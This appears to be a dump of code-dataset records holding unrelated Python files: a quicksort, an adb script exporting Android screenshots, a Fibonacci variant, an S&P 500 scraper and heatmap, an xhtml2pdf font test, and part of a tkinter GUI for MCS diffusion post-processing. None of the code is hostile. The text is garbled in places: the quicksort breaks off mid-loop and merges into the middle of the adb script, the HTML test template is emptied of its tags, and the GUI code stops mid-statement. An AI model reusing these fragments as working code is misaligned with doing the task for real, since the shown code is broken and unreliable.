valid_symbols).lines[0].tokens\n symbol_tokens = [t for t in tokens if t.type == TokenType.symbol]\n combined_symbol = b\"\".join(token.s for token in symbol_tokens).decode(\"utf-8\")\n # check all symbol characters are represented once and once only\n assert combined_symbol == symbol\n # check for exact match\n if symbol in valid_symbols:\n assert len(symbol_tokens) == 1\n assert (TokenType.symbol, 0, 0, 0.0, symbol.encode(\"utf-8\")) in symbol_tokens\n # check each symbol token represents either a single token or a 
valid combo\n for token in symbol_tokens:\n assert len(token.s) == 1 or token.s.decode(\"utf-8\") in valid_symbols\n","sub_path":"test/test_lex.py","file_name":"test_lex.py","file_ext":"py","file_size_in_byte":11251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"571534065","text":"from .mapper import Mapper\n\n\nclass Metaclass(type):\n\n def __call__(cls, *args, **kwargs):\n obj = cls.__new__(cls,*args, **kwargs)\n args_list = list(args)\n if Mapper.exist(cls):\n params = Mapper.get_params(cls)\n args_list.extend(params)\n obj.__init__(*args_list, **kwargs)\n return obj","sub_path":"src/main/python/media_downloader/infrastructure/dependency_injection/meta_class.py","file_name":"meta_class.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"70497631","text":"\n\n\ndef Quicksort(list,begin,end):\n if begin>=end: #防止递归无限继续下去报错,在最后分成1个数排序之后 例如[34] 递归的时候return出来\n return\n temp=list[begin]\n i=begin\n j=end\n while i= temp:\n j-=1\n list[i]=list[j]\n\n while i 1:\n print(\"Please choose the device with which you want to continue:\\n\")\n for key, value in devices_dict.items():\n print(f\"{key}.\", value['device_id'], '-', value['device_md'])\n\n # User picks the device number and is converted to int\n # This also blocks the user to input anything but a number\n print(\"\\nPick a number that reflects the ones from the devices above.\\n\")\n\n try:\n user_input = input(\"> \")\n user_input = int(user_input)\n except Exception as e:\n print(f\"The value '{user_input}' is not a number. 
The script will now exit.\")\n sys.exit(0)\nelse:\n user_input = 1\n\n# Get the device id and model that the user selected\ntry:\n device_id = devices_dict[user_input]['device_id']\n device_model = devices_dict[user_input]['device_md']\nexcept Exception as e:\n print(f\"The position {user_input} does not exist.\")\n sys.exit(0)\n\nprint(f\"\\n### The device id: '{device_id}' which has the model: '{device_model}' was assigned for the script ###\")\n\n# Get the screenshots folder\ndevice_mtp = '/sdcard/'\nfolder_searched = 'Screenshots'\nstream = subprocess.check_output(['adb', '-s', device_id, 'shell', 'find', device_mtp, '-name', folder_searched])\nfolders_found = stream.decode(\"utf-8\").strip()\n\nif folders_found:\n export_folder = [item for item in folders_found.split('\\r\\n') if '.' not in item][0]\nelse:\n raise Exception(f\"There were no '{folder_searched}' folders found.\")\n\n# Get all photos from the folder found\nstream = subprocess.check_output(['adb', '-s', device_id, 'shell', 'cd', export_folder, ';', 'ls'])\nphotos_text = stream.decode(\"utf-8\").strip()\nphotos_list = compile(r'\\r\\n|\\r\\r\\n').split(photos_text)\nphotos_size = len(photos_list)\n\n# Create a dict with all the data existing in the screenshots folder\n# While some devices decide to only put screenshots here, some\n# manufacturers also add screen recordings here\nphotos_sorted = []\nfor photo_name in photos_list:\n stream = subprocess.check_output(['adb', '-s', device_id, 'shell', 'stat', '-c', '%y', f\"{export_folder}/'{photo_name}'\"])\n photo_attr = stream.decode(\"utf-8\").strip().split()\n photo_cdate = photo_attr[0]\n photo_ctime = search(r'.*(?=\\.|\\\\b)' ,photo_attr[1])[0]\n photos_sorted.append({'photo_name': photo_name, 'photo_cdate': photo_cdate, 'photo_ctime': photo_ctime})\n\n# Sort the list by their date and time and reverse them in order to get from the\n# oldest to the newest\nphotos_sorted = sorted(photos_sorted, \n key=lambda x: 
(datetime.datetime.strptime(x['photo_cdate'], '%Y-%m-%d'),\n datetime.datetime.strptime(x['photo_ctime'], '%H:%M:%S')),\n reverse=True)\n\n# Create new folder on the Desktop in which the export will be done\ndefault_export_folder = 'export_screenshots'\ndesktop_path = os.environ['USERPROFILE'] + '\\\\Desktop\\\\'\ncomplete_path = desktop_path + default_export_folder\n\nif not os.path.exists(complete_path):\n print(f\"\\n### Creating export folder at: '{complete_path}' ###\")\n os.mkdir(complete_path)\n\n# Check if the parameter volume gets a value higher than the number of items available\nif args.volume > photos_size:\n print(f\"\\n### Changing the volume to {photos_size} since there aren't {args.volume} items ###\")\n args.volume = photos_size\n\n# Exporting the files requested\nfor pos in range(args.volume):\n photo_name = photos_sorted[pos]['photo_name']\n stream = subprocess.check_output(['adb', '-s', device_id, 'pull', \n f'{export_folder}/{photo_name}',\n complete_path])\n result_string = stream.decode(\"utf-8\")\n print(f'\\n### {result_string} ###')","sub_path":"export_screenshots/get_screenshots.py","file_name":"get_screenshots.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"486863577","text":"def fibo(n,f,s):\n \n if f == s:\n print('f == s ', n)\n if n <= f-1:\n return 0;\n elif n == f:\n return f\n else:\n return ((fibo((n-1),f,s))**2 + fibo((n-2),f,s))\n else:\n print('data -> ', n)\n if n == f:\n return f\n elif n == s:\n return s\n else:\n return ((fibo((n-1),f,s))**2 + fibo((n-2),f,s))\n\ndef main():\n d=input()\n data=fibo(int(d),1,1)\n print(data)\n\nif __name__:\n import cProfile\n cProfile.run(\"main()\")\n","sub_path":"algorithm/customfibo.py","file_name":"customfibo.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542487391","text":"import bs4 
as bs\nimport pickle\nimport requests\nimport datetime as dt\nimport os\nimport pandas as pd\nimport pandas_datareader.data as web\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport numpy as np\n\nstyle.use('ggplot')\n\n#\tUsing the examples taught by sentdex from his youtube channel\n\n\ndef save_sp500_tickers():\n\tprint (\"Saving the S&P500 tickers...\")\t#\tJust for debug\n\tresp = requests.get('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\n\tsoup = bs.BeautifulSoup(resp.text, \"lxml\")\n\ttable = soup.find('table', {'class':'wikitable sortable'})\n\ttickers = []\n\tfor row in table.findAll('tr')[1:]:\n\t\tticker = row.findAll('td')[0].text\n#\tTreating these two companies for this character exception\n#\tFrom the wiki they are shown as a '.' and you need to use the\n#\t'-' to pull data from Yahoo Finance\n\t\tif ticker == 'BRK.B':\n\t\t\tticker = 'BRK-B'\n\t\tif ticker == 'BF.B':\n\t\t\tticker = 'BF-B'\n\t\ttickers.append(ticker)\n\n\twith open(\"sp500tickers.pickle\", \"wb\") as f:\n\t\tpickle.dump(tickers, f)\n\t\tprint(\"File sp500tickers.pickle created\")\t# Just for Debug\n\n\treturn tickers\n\n\n#save_sp500_tickers() - nao vamos mais usar\n\ndef get_data_from_yahoo(reload_sp500=True):\n\n\tif reload_sp500:\n\t\ttickers = save_sp500_tickers()\n\telse:\n\t\twith open(\"sp500tickers.pickle\",\"rb\") as f:\n\t\t\ttickers = pickle.load(f)\n\n\tif not os.path.exists('stock_dfs'):\n\t\tos.makedirs('stock_dfs')\n\n\tstart = dt.datetime(2000,1,1)\t#\tThese dates can change\n\tend = dt.datetime(2016,12,31)\n\n\tfor ticker in tickers: #\t[:10]: Este indice do ticker\n\t#\tDeve ser modificado se quero pegar a lista inteira\n\t#\tNo caso, estou usando os 10 primeiros para poder\n\t#\ttestar\n\n\t#\tThat ticker index can be changed so you dont need to wait for all \n\t#\tthe #500 companies to be pulled (it should take some 10-20 minutes\n\t#\tdepending on your computer)\n\t\tprint(ticker+'...ready')\t#\tJust for debug\n\t\tif not 
os.path.exists('stock_dfs/{}.csv'.format(ticker)):\n\t\t\tdf = web.DataReader(ticker,'yahoo',start,end)\n\t\t\tdf.to_csv('stock_dfs/{}.csv'.format(ticker))\n\t\telse:\n\t\t\tprint('Already have {} file'.format(ticker)) #\tSentdex debug\n\n#get_data_from_yahoo()\n\ndef compile_data():\n\n\twith open(\"sp500tickers.pickle\",\"rb\") as f:\n\t\ttickers = pickle.load(f)\n\t\tprint('loaded tickers to compile')\t#\tJust for debug\n\t#tickers = save_sp500_tickers()\n\tmain_df = pd.DataFrame()\n\n\tfor count,ticker in enumerate(tickers): #\t[:10]: - see comment above\n\t\tprint('reading '+ticker)\t#just for debug\n\t\tdf = pd.read_csv('stock_dfs/{}.csv'.format(ticker))\n\t\tdf.set_index('Date', inplace=True)\n \n\t\tdf.rename(columns = {'Adj Close' : ticker}, inplace=True)\n\t\tdf.drop(['Open','High','Low','Close','Volume'], 1, inplace=True)\n\n\t\tif main_df.empty:\n\t\t\tmain_df = df\n\t\telse:\n\t\t\tmain_df = main_df.join(df, how='outer')\n\n\t\tif count % 10 == 0:\n\t\t\tprint(count)\t#\tjust for debug, counting each 10 companies\n\t\t\t\t\t\t\t#\tprocessed\n\t\tprint(ticker+' compiled. 
Next...')\t#\tjust for debug\n\n\tprint (main_df.head())\n\tprint('Saving sp500_joined_closes.csv file...')\t# \tjust for debug\n\tmain_df.to_csv('sp500_joined_closes.csv')\n\n#get_data_from_yahoo()\n#compile_data()\n\ndef visualize_data():\n\tdf = pd.read_csv('sp500_joined_closes.csv')\n#\tdf['MMM'].plot()\n#\tprint('Plotting...')\n#\tplt.show()\n\tdf_corr = df.corr()\t\t\t#\tcreating correlation table\n#\tprint(df_corr.head())\t\t#\tthis line is not necessary\n\n\tdata = df_corr.values\t\t#\tget only the values, ignore header\n\t\t\t\t\t\t\t\t#\tand index\n\tfig = plt.figure()\t\t\t#\tcreating the graphic\n\tax = fig.add_subplot(1,1,1)\n\n\theatmap = ax.pcolor(data, cmap=plt.cm.RdYlGn)\t#\tsetting up the heatmap\n\n\tfig.colorbar(heatmap)\t#\tput heat color scale (legenda) to the side\n\tax.set_xticks(np.arange(data.shape[0]) + 0.5, minor=False)\n\tax.set_yticks(np.arange(data.shape[1]) + 0.5, minor=False)\n\tax.invert_yaxis()\t#\tinverting the yaxis so it doesnt have any \n\t\t\t\t\t\t#\tempty space on top\n\tax.xaxis.tick_top()\t#\tMove the X ticks to the top\n\n\tcolumn_labels = df_corr.columns #\tget the names from the tickers\n\trow_labels = df_corr.index \t\t#\tget the names from the tickers\n\n\tax.set_xticklabels(column_labels) #\tSet the names for the axis\n\tax.set_yticklabels(row_labels)\t #\tset the names for the axis as well\n\tplt.xticks(rotation=90)\t\t\t #\trotate the graphic to be shown down \n\t\t\t\t\t\t\t\t\t# and to the right\n\theatmap.set_clim(-1,1)\t#\tDefine the range\n\tplt.tight_layout()\t#\tshow the data tightly\n\tplt.show()\n\n\n\n\n#\tIf this is the first time running, please run first these two:\n\n#get_data_from_yahoo()\n#compile_data()\n\n#\tTo create all related files and spreadsheets\n\n\nvisualize_data()\n\n#\tThis code has until the 8th video of sentdex playlist 'Python for \n#\tfinance' videos from 
youtube\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python_finance_2.py","file_name":"python_finance_2.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72846163","text":"# -*- coding: utf-8 -*-\nimport io\nfrom unittest import TestCase\nimport unittest\nimport os\nfrom xhtml2pdf.document import pisaDocument\n\n__doc__ = \"\"\"\n FontFamilyCombination provides us auxiliary functions to check\n the correct operation code that check one we have one or more font-name in CSS font-family.\n \"\"\"\n\nclass FontFamilyCombination(TestCase):\n\n\n tests_folder = os.path.dirname(os.path.realpath(__file__))\n fRegular_path = os.path.join(tests_folder, 'samples', 'font', 'Noto_Sans', 'NotoSans-Regular.ttf')\n fBold_path = os.path.join(tests_folder, 'samples', 'font', 'Noto_Sans', 'NotoSans-Bold.ttf')\n\n FFRegular = \"@font-face {{font-family: '#Noto_Regular','Times New Roman'; src: url(\\'{ttf}\\');}}\".format(ttf=fRegular_path)\n FFBold = \"@font-face {{font-family: Noto_Bold; src: url(\\'{ttf}\\');}}\".format(ttf=fBold_path)\n\n fRegular = \".fRegular{font-family: '#Noto_Regular', 'Times New Roman';}\"\n fBold = \".fBold{font-family: Noto_Bold;}\"\n\n pisa_doc = None\n\n #TRUE IF WE USE MORE THAN ONE FONT-NAME AS FAMILY-NAME VALUE\n values = True\n\n HTML_CONTENT = u\"\"\"\n \n \n \n \n \n \n\n \n Regular font type\n Bold font type\n \n\n \"\"\"\n\n def setUp(self):\n #Setting values that to be used in the following methods\n html = self.HTML_CONTENT.format(FFBold=self.FFBold, FFRegular=self.FFRegular,\n fRegular=self.fRegular, fBold=self.fBold)\n with io.BytesIO() as pdf_file:\n self.pisa_doc = pisaDocument(src=html,\n dest=pdf_file)\n\n\n def test_check_more_than_one_fontName(self):\n \"\"\"\n this function help us to check is the font-family contain a font-name list.\n \"\"\"\n fonts = []\n for css_class in self.pisa_doc.css[0].values():\n for font in 
css_class.values():\n fonts.append(font)\n for font in fonts:\n if isinstance(font,list):\n result = font\n break\n #here we are checking if fonts in pdf-doc contain a font-name list\n self.assertIsInstance(result,list)\n\n @unittest.skipIf(values == True,'\"test_check_only_one_fontName\" just need to run if font-family only have one font-name')\n def test_check_only_one_fontName(self):\n \"\"\"\n this function help us to check is the font-family contain only one font-name .\n \"\"\"\n fonts = []\n result = False\n for css_class in self.pisa_doc.css[0].values():\n for font in css_class.values():\n fonts.append(font)\n for font in fonts:\n if not isinstance(font, list):\n result = True\n else:\n result = False\n break\n #here we are checking if all objects in fonts list are str, the result have to be True\n self.assertTrue(result)\n","sub_path":"tests/test_CSS_font-family_font_combination.py","file_name":"test_CSS_font-family_font_combination.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"319605014","text":"# #################################################################################\nfrom __future__ import division, print_function;\n\nimport os, sys, time, datetime;\nimport numpy as np;\nimport matplotlib.pyplot as plt;\nfrom matplotlib import cm;\n\nplt.ion();\n\nimport tkinter as tk;\nimport tkinter.font as tkFont;\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename, askdirectory;\nimport tkinter.messagebox as mBox;\nimport tkinter.filedialog as tkFileDialog;\nfrom tkinter import ttk # separator\n\n# to show tooltip box,\nimport platform;\nfrom platform import python_version\nfrom sys import platform as _platform\nfrom pprint import *\n\nimport pdb;\n\n# set path to import myModule/*.py\nmyHomeDir = os.path.expanduser(\"~\");\nmyModuleDirCurr = os.path.join(os.getcwd(), 'myModules');\nmyModuleDirCloud = 
os.path.join(os.path.split(os.getcwd())[0], 'myModules');\n\nif os.path.exists(myModuleDirCurr): myModuleDir = myModuleDirCurr;\nelif os.path.exists(myModuleDirCloud): myModuleDir = myModuleDirCloud;\nelse: myModuleDir = None;\n\nif myModuleDir != None: sys.path.insert(0, myModuleDir);\n\nimport re;\n\nimport mcsPstProc as mPstP; # post-processing MCS data\nfrom mcsPstProc import colored, cPrint, getCurrLineNo;\n\nfrom myToolTip import *;\n\nGPS = None;\n\ngpsLblTxt = \"MCS\\nPst-Proc\\n\";\n\nimport multiprocessing; # get number of cores available, ...\n\nimport mcsHelps as HELP; # import help text\nimport mcsGlobalVars as MGV; # import help text\n\ncsFont = {'fontname':'Comic Sans MS', 'fontsize':'14'};\nhFont = {'fontname':'Helvetica', 'fontsize':'14'};\nmFont = {'fontname':'Monaco', 'fontsize':'14'};\n\nroot = tk.Tk();\n\nbShowToolTip = True; # False;\n\nclass GUI_MCS():\n global GPS, gpsLblTxt;\n\n def __init__(self):\n # tk.tk.Frame.__init__(self, root, height=42, width=42)\n # ===============initialize GUI frames=========================\n self.frm0, self.frm1, self.frm2, self.frm3, self.frm4 = None, None, None, None, None;\n\n self.tmStr = None;\n\n if sys.platform in [\"win32\", \"windows\", \"linux\"]: self.bUnit, self.dUnit = \"s/mm2\", \"mm2/s\";\n else: self.bUnit, self.dUnit = u\"mm\\u00B2/s\", u\"\\u00D710\\u207B\\u00B3 s/mm\\u00B2\";\n\n self.mcsPstPro = tk.BooleanVar(); # Run mcs post processing\n self.mcsPstPro.set(True);\n self.bMaxTxt, self.delGTxt, self.delDeltaTxt = u\"maxB:%s\" % self.bUnit, \"\\u0394G\\u20D7 (mT/m)\", \"\\u0394Delta (ms)\";\n self.varyDelTxt, self.varyGdTxt, self.constBTxt = u\"vary \\u0394\", \"vary G\\u20D7\", \"cnst B\";\n\n self.postProCal, self.initDsp = tk.BooleanVar(), tk.BooleanVar();\n self.postProCal.set(True), self.initDsp.set(True);\n self.varyDelGdB = None;\n\n self.bMkDiffMovie, self.openHdrTxt, self.bCalcT2 = tk.BooleanVar(), tk.BooleanVar(), tk.BooleanVar();\n\n self.bMkDiffMovie.set(False), 
self.openHdrTxt.set(False), self.bCalcT2.set (False);\n self.bMcsDataLoaded = None;\n\n self.constantDiffTime, self.bMpiPySigComp = tk.BooleanVar(), tk.BooleanVar();\n self.constantDiffTime.set(True), self.bMpiPySigComp.set(False);\n\n self.smallDel, self.bigDel, self.GdStep, self.nbVals = tk.DoubleVar(), tk.DoubleVar(), tk.DoubleVar(), tk.IntVar();\n self.smallDel.set(10.0), self.bigDel.set(100.0), self.GdStep.set(10.0), self.nbVals.set(10);\n\n self.grdDirFromZ = tk.DoubleVar();\n self.grdDirFromZ.set(90.);\n\n # to display max bVal for mcsPostProcess, ...\n self.gamma = 6.28318* 42577481.6;\n self.dGradNB, self.dGradNBL = None, []; # related to diffusion table, ...\n\n self.TE_ms, self.maxG = tk.DoubleVar(), tk.DoubleVar();\n\n # to read a text G-Waveform table (timw_sec, amplitude, duration_sec)\n self.bGWaveTblRead = None;\n self.gWaveFileName, self.dGWaveTbl = None, None;\n\n self.dirFileName = None;\n self.dataFileName = []; # mcs data file names, ...\n\n self.fInfo = None # file info populated from the function mPstP.selectDataFiles()\n\n self.btnPsP = None;\n #self.btnPsP_0 = None;\n self.cBtnPsP, self.cBtnPsP_2, self.lblPsP, self.entPsP, self.cBtnPsP_3 = [], [], [], [], [];\n self.btnPsP_4 = [];\n\n self.cBtnPsPVal, self.cBtnPsP_2Val, self.cBtnPsP_3Val, self.Btn4Val = [], [], [], [];\n # ========================MPI post processing Ends=================\n\n self.w0Wd, self.w0Ht, self.w0X, self.w0Y = None, None, None, None;\n\n # colors for checkButton\n self.fgClrC, self.bgClrC = \"yellow\", \"blue\"; # \"black\";\n self.fgClrB, self.bgClrB = \"navy\", \"gray64\";\n self.hlBgColor = \"green\";\n\n self.colorMap4Dsp = eval(\"cm.gray\");\n\n if _platform in [\"linux\", \"linux2\"]:\n self.titleFont = tkFont.Font(family=\"Ariel\", weight='bold', size=10);\n # self.titleFont = tkFont.Font(family=\"Fixedsys\", weight='bold', size=10);\n self.procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n self.lableFont = tkFont.Font(family=\"Ariel\", 
weight='bold', size=10);\n self.buttonFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.buttonFontSm= tkFont.Font(family=\"Helvetica\", weight='bold', size= 8);\n self.inputFont = tkFont.Font(family=\"Monaco\", weight='bold', size=10);\n self.boldFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.optFnt, self.optFntSz = \"Fixedsys\", 9;\n self.infoFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n winWd, winHt = 750, 400;\n elif _platform in [\"win32\", \"windows\"]:\n self.titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.lableFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=11);\n self.buttonFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.buttonFontSm= tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n self.inputFont = tkFont.Font(family=\"Monaco\", weight='bold', size= 9);\n self.boldFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n self.infoFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 8);\n self.optFnt, self.optFntSz = \"Fixedsys\", 9;\n winWd, winHt = 750, 400;\n elif _platform == \"darwin\":\n self.titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=14);\n self.procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.lableFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n self.buttonFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=11);\n self.buttonFontSm= tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.inputFont = tkFont.Font(family=\"Monaco\", weight='bold', size=12);\n self.boldFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n self.boldFont13 = tkFont.Font(family=\"Helvetica\", weight='bold', size=13);\n self.infoFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n self.optFnt, self.optFntSz = 
\"Monaco\", 11;\n winWd, winHt = 800, 400;\n\n self.initGUI (); # Initialize GUI frame\n\n def gui_makeInfoFrame (self):\n fgClrB, bgClrB = 'navy', 'black';\n hlBgColor = \"green\"\n if _platform in [\"win32\", \"windows\", \"linux\"]:\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n cmdFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n else:\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=14);\n cmdFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=16);\n\n self.hLine01 = ttk.Separator(self.frm0, orient=\"horizontal\"\n ).grid(row=0, column=1, columnspan=5, pady=1, sticky=\"ewns\")\n\n # png -> gif: http://image.online-convert.com/convert-to-gif\n self.myLogo = tk.PhotoImage(file=\"myLogoBGW.gif\"); # *.gif with ~ 72x100 pixels\n self.myLogo = self.myLogo.subsample(5,5); # only integer fraction\n #self.myLogo = self.myLogo.zoom(4, 4);\n\n self.myLogo_L = tk.Label(self.frm0, image=self.myLogo, bg='gray')\n self.myLogo_L.image = self.myLogo; # become transparent without this reference\n self.myLogo_L.grid (row=0, rowspan=4, column=0, sticky=\"ewns\");\n\n self.myLogo_L.bind (\"\",\n lambda event: getHelp(\"Yes for further HELP\",\n hlp.myGreeting_L, hlp.myGreeting_L2, \"no\"));\n\n # The selBox: Use a StringVar to access the selector's value\n # Look for \"unicode, Hangul Syllables\" on the web\n titleText = (\"myMCS:\\tv.08122021: -Click HERE for contact & more info\");\n titleText += (\"\\n\\t- postProcess MCS position data from MPI Server\");\n\n widB = 6 if sys.platform in [\"darwin\"] else 12;\n self.myGreeting_L = tk.Label(self.frm0, text=titleText, font=self.boldFont,\n fg='white', bg='black', padx=4, pady=0, width=78,\n anchor=\"w\", justify=tk.LEFT);\n self.myGreeting_L.grid (row=0, rowspan=1, column=1, columnspan=6, sticky=\"wens\");\n\n # color map for display\n self.colorMap4Dsp_L = tk.Label(self.frm0, text=\"colorMap\",\n borderwidth=1, relief=\"groove\",\n font=self.boldFont, 
fg=\"white\", bg=\"navy\");\n self.colorMap4Dsp_L.grid (row=1, column=1, sticky=\"wesn\");\n self.colorMap4Dsp = tk.StringVar();\n self.colorMap4Dsp_O = tk.OptionMenu(self.frm0, self.colorMap4Dsp,\n \"gray\", \"Blues\", \"Greens\", \"Reds\",\n \"OrRd\", \"YlGn_r\", \"hot\", \"cool\",\n \"jet\", \"rainbow\", \"ocean\",\n \"magma\", \"plasma\", \"BuGn\");\n self.colorMap4Dsp_O.grid (row=1, column=2, sticky=\"wesn\");\n self.colorMap4Dsp_O.config(font=(self.optFnt,self.optFntSz),bg='green',fg='black',width=6);\n self.colorMap4Dsp_O['menu'].config(font=(self.optFnt,self.optFntSz),bg='yellow',fg='black');\n self.colorMap4Dsp.set(\"magma\");\n mgv.colorMap4Dsp = eval(\"cm.\" + self.colorMap4Dsp.get());\n if bShowToolTip:\n tip = ToolTip(self.colorMap4Dsp_O, \"{colorMap4Dsp} Choose a colormap for display.\");\n\n self.colorMap4Dsp_L.bind (\"\", lambda event:\n getHelp(\"Yes for further HELP\", hlp.hlpColorMap_L, \"no\"));\n\n # Pulse sequence type (PST) for post-processing\n self.plsSeqType_L = tk.Label (self.frm0, text=\"plsSeqType\",\n borderwidth=1, relief=\"groove\",\n font=self.boldFont, fg=\"white\", bg=\"navy\");\n self.plsSeqType_L.grid (row=1, column=3, sticky=\"wesn\");\n self.plsSeqType = tk.StringVar();\n self.plsSeqType_O = tk.OptionMenu(self.frm0, self.plsSeqType, \"SpinEcho\", \"StimEcho\");\n self.plsSeqType_O.grid (row=1, column=4, sticky=\"wesn\");\n self.plsSeqType_O.config(font=(self.optFnt,self.optFntSz),bg='green',fg='black',width=6);\n self.plsSeqType_O['menu'].config(font=(self.optFnt,self.optFntSz),bg='yellow',fg='black');\n self.plsSeqType.set(\"StimEcho\");\n mgv.plsSeqType = self.plsSeqType.get();\n if bShowToolTip:\n tip = ToolTip(self.plsSeqType_O, \"{plsSeqType} Choose a pulse sequence type for post-processing.\");\n\n self.plsSeqType_L.bind (\"\", lambda event:\n getHelp(\"Yes for further HELP\", hlp.hlpPlsSeqType_L, \"no further help\", \"no\"));\n\n # T2 values of H2O in ics, mls, ecs in ms\n self.t2Vals_L = tk.Label (self.frm0, 
text=\"T\\u2082: (IA.ML.EA) (ms)\",\n borderwidth=1, relief=\"groove\",\n font=self.boldFont, fg=\"white\", bg=\"navy\");\n self.t2Vals_L.grid (row=1, column=5, sticky=\"wesn\");\n self.t2Vals = StringVar ( );\n self.t2Vals_E = tk.Entry (self.frm0, textvariable=self.t2Vals, width=8,\n state=\"disabled\", justify=tk.CENTER, bd=1);\n self.t2Vals_E.grid (row=1, column=6, sticky=\"ewns\", pady=1);\n self.t2Vals.set (\"100.10.100\");\n self.t2Vals_E.bind (\"\", lambda event: self.updateProtFtn(\"t2Vals_E\"));\n self.t2Vals_L.bind (\"\", lambda event:\n getHelp(\"Yes for further HELP\", hlp.hlpT2Vals_L, \"no further help\", \"no\"));\n\n # global functions\n self.UP_B = tk.Button(self.frm0, text='update protocol', font=self.titleFont,\n fg=\"darkgreen\", bg=bgClrB, padx=3, width=widB,\n command=lambda: self.updateProtFtn(\"UP_B\"));\n self.UP_B.grid (row=2, column=1, columnspan=2,sticky=\"wens\");\n\n self.CF_B = tk.Button(self.frm0, text='close\\n all figs.', font=self.titleFont,\n fg=fgClrB, bg=bgClrB, padx=3, width=widB,\n command=lambda: self.closeFigFtn());\n self.CF_B.grid (row=2, column=3, sticky=\"wens\");\n\n self.EP_B = tk.Button(self.frm0, text='enter pdb\\nh/hlp, c/cont., l/lst, j/jmp', padx=3,\n width=widB, fg=\"darkorange\", font=self.titleFont,\n command=self.enterPdbFtn);\n self.EP_B.grid (row=2, column=4, columnspan=2, sticky=\"ewns\");\n self.EP_B.bind (\"\",\n lambda event: getHelp(\"Yes for further HELP\", hlp.hlpEP, \"no further help\"));\n\n self.QT_B = tk.Button(self.frm0, text='Q U I T', padx=3,\n width=widB - 2*(_platform in [\"linux\"]),\n fg=\"red\", font=self.titleFont,\n command=self.quitFtn);\n self.QT_B.grid (row=2, column=6, columnspan=1, sticky=\"ewns\");\n\n self.hLine02 = ttk.Separator(self.frm0, orient=\"horizontal\").grid(row=3, column=1, columnspan=6, pady=1, sticky=\"ewns\");\n\n def quitFtn (self):\n global ugv, udv;\n\n myMod1 = \"quitFtn\";\n\n root.destroy();\n sys.exit(); # self.quit;\n\n def gui_mcsPstPro(self, row1=0, 
col1=1):\n myMod12 = \"guiPsP\";\n\n fgclr, fgclr_entry, bgclr = 'white', 'black', 'gray32'\n fgClrC, bgClrC = self.fgClrC, self.bgClrC;\n\n try:\n self.btnPsP.destroy();\n for btn in self.cBtnPsP: btn.destroy();\n except: pass;\n\n def InItDisplay (row1=1, col1=2):\n row1 += 1; # for hLine31\n self.cBtnPsP_2.append(self.guiChkButton(self.frm3, \"opnHdr\", self.openHdrTxt,\n fg1=fgClrC, bg1=bgClrC, row1=row1, col1=col1,\n wid1 = 7 + 2*(_platform in [\"linux\"]),\n state1=\"disabled\",\n indOn=0, def1=True, cmd1=None));\n self.cBtnPsP_2Val.append ( self.openHdrTxt );\n\n self.cBtnPsP_2Val.append ( self.bCalcT2 );\n self.bCalcT2.set (False);\n\n col1 += 1;\n self.btnPsP_2 = self.guiButton(self.frm3, 'display Geometry',\n fontB=self.buttonFont,\n row1=row1, col1=col1, colSpan=3,\n fg1=self.fgClrB, hlBgClr1=\"green\",\n cmd1=lambda: self.loadNDisplayFtn(\"EKJ\"));\n\n # read-only\n col1 += 3;\n self.TE_ms_L = tk.Label (self.frm3, text=\"TE (ms)\",\n borderwidth=1, relief=\"groove\",\n fg=fgclr, bg=bgclr,\n font=self.boldFont);\n self.TE_ms_L.grid (row=row1, column=col1, sticky=\"wesn\");\n\n self.TE_ms = tk.DoubleVar();\n self.TE_ms_E = tk.Entry (self.frm3, textvariable=self.TE_ms, width=7,\n font=self.inputFont,\n state=\"normal\", justify=tk.CENTER, bd=1);\n self.TE_ms_E.grid (row=row1, column=col1+1, sticky=\"ewns\", pady=1);\n self.TE_ms.set(20); # s/m2\n self.TE_ms_E.bind (\"\", lambda event: self.updateProtFtn(\"TE_ms_E\"));\n mgv.TE_ms = self.TE_ms.get();\n\n def postProCal (row1=2, col1=1):\n '''\n try:\n self.btnPsP_4.destroy();\n\n #for btn in self.cBtnPsP_3: btn.destroy();\n for lbl in self.lblPsP: lbl.destroy();\n for ent in self.entPsP: ent.destroy();\n except: pass;\n '''\n\n row1 += 1; # hLine31\n if sys.platform in [\"win32\", \"windows\", \"linux\"]:\n lbls = [u\"\\u2220 (G\\u20D7, e\\u2081)\", \"\\u03B4 (ms)\", \"\\u0394 (ms)\", \"nbVals\"];\n else: lbls = 